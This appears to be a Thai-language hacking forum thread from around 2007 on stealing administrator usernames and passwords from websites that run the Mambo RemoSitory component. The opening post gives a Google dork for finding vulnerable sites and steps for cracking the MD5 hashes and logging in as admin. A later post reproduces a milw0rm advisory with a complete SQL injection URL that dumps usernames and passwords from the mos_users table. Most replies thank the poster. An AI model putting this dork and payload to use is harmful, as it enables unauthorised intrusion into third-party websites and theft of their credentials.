Results 1 to 8 of 8

Thread: การ hack Mambo เพื่อขโมย username/password

  1. #1


    ช่องโหว่ใหม่ล่าสุดของ Mambo Component RemoSitory (cat) ที่สามารถดู username/password ของ Mambo ได้

    1) วิธีหา host ที่มีช่องโหว่

    http://www.google.co.th/search?q=inurl:fu...tart=0&sa=N

    2) วิธีการโจมตี

    **Hidden Content: To see this hidden content your post count must be 5 or greater.**


    TARGET=ชื่อ website ที่มีช่องโหว่

    3) ตัวอย่างการโจมตีจริง

    **Hidden Content: To see this hidden content your post count must be 5 or greater.**


    4) password ที่ได้มาจะถูก hash ด้วย MD5

    ให้นำ hash ที่ได้ไปลอง search database ดูได้ที่

    http://www.tmto.org/?category=main&page=search_md5

    จะได้ password จริงของ admin มา ลองดูเองนะ ว่าได้อะไร (แต่ห้ามไปลองใช้นะ...)

    5) วิธีการ Login ถ้าคนเคยใช้ Mambo จะรู้ว่าหน้า Login อยู่ที่ไหน ไม่รู้ลอง google ดู

    Have fun
    0x90
    tonynuc
    0x90
    tonynuc

    ...

  2. #2


    ขอวิธีทำอย่างละเอียดหน่อยครับ ยังไม่เข้าใจครับ ยังไงก็ขอบคุณล่วงหน้าและกันครับ
    NEXT BIG TING!

  3. #3
    Junior Member
    Join Date
    Aug 2007
    Posts
    13


    อธิบายยังไม่ค่อยระเอียด ขอละเอียดนิดนึงครับ
    ยังไงก้อขอบคุณสำหรับสิ่งดีๆ

  4. #4
    Junior Member
    Join Date
    Nov 2006
    Posts
    5


    สุดยอดมากๆครับ ขอบคุณมากๆเลย เมื่อนำมาผนวกกับ google ทำให้เราเห็นอะไรเย๊ะมากครับ จะได้ไปหาทางปิดเว็บป๋มก่อน

  5. #5
    Junior Member
    Join Date
    Aug 2007
    Posts
    15


    http://TARGET/index.php?option=com_r...%20mos_users/* <<<<ใครเปิดลิ้งค์นี้ได้้ครับ ผมเปิดไม่ได้นะครับ แก้ไขให้ที
    [SIZE=2][url="http://www.citecclub.org/forum/-IE7-WMP11-Windows--t13511.html"]วิธีลง WMP11 และ Internet Explorer7 ใน windows ปลอม[/url][/SIZE]

  6. #6
    Senior Member
    Join Date
    Oct 2006
    Location
    chiangmai
    Posts
    110


    *******************************************************************************
    # Title : Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability
    # Author : ajann
    # Contact :
    # S.Page : http://www.remository.com/
    # $$ : Free
    # Dork : inurl:func=selectcat + com_remository // Result:43.400
    # DorkEx : http://www.google.com.tr/search?q=inurl:fu...tart=0&sa=N

    *******************************************************************************

    [<div class='sqltop'>SQL</div><div class='sqlmain'>]]---------------------------------------------------------

    http://[target]/[path]///index.php?option=com_remository&func=[color=blue;font-weight:bold]select[/color]cat&cat=[SQL]

    Example:

    //index.php?option=com_remository&func=[color=blue;font-weight:bold]select[/color]cat&cat=64549999%20union%20[color=blue;font-weight:bold]select[/color]%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*

    [ </div>]

    """""""""""""""""""""
    # ajann,Turkey
    # ...

    # Im not Hacker!

    # milw0rm.com [2007-08-23]
    [url]http://starpicpost.com[/url]
    [url]http://chiangmaihorpak.com[/url]

  7. #7
    Junior Member
    Join Date
    Aug 2007
    Posts
    5


    ขอบคุณมากๆเลยครับตือว่าพอดีผมกำลังเรียนอยู่พอดีครับ และผมก็กำลังมีปัญหา คือผมลืมพาสเวิดครับ พอดีเห็นกระทุ้นี้ โดนใจเลยครับ
    ตอนแรกนึกว่าจะได้ลงใหม่แล้วครับ ขอบคุณมากครับ

  8. #8
    Junior Member
    Join Date
    Aug 2007
    Posts
    10


    ขอบคุณครับ มันมีประโยนช์ต่อผมมากครับ ผมจะเรียนรู้ไว้ เพื่อจะเอาไปประยุกค์ใช้ได้นะครับ

Similar Threads

  1. เกี่ยวกับการ Hack Mambo ครับ
    By kabushino in forum Newbie / Starter Hacker
    Replies: 3
    Last Post: 24-09-2007, 05:02 PM
  2. Username และ Password สำหลับต่อ Net
    By lastnamemy in forum Newbie / Starter Hacker
    Replies: 3
    Last Post: 16-09-2007, 01:01 AM
  3. update username&password NOD32
    By dent in forum ESET NOD32 Antivirus
    Replies: 0
    Last Post: 07-09-2007, 03:13 PM
  4. update username&password NOD32
    By dent in forum ESET NOD32 Antivirus
    Replies: 1
    Last Post: 06-09-2007, 06:57 PM
  5. Username และ Password สำหรับ Net free คับ
    By viruser in forum Gaming, Bot, Cheating and Tweaking tool
    Replies: 1
    Last Post: 18-07-2007, 10:59 AM

Members who have read this thread : 0

Actions : (View-Readers)

There are no names to display.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •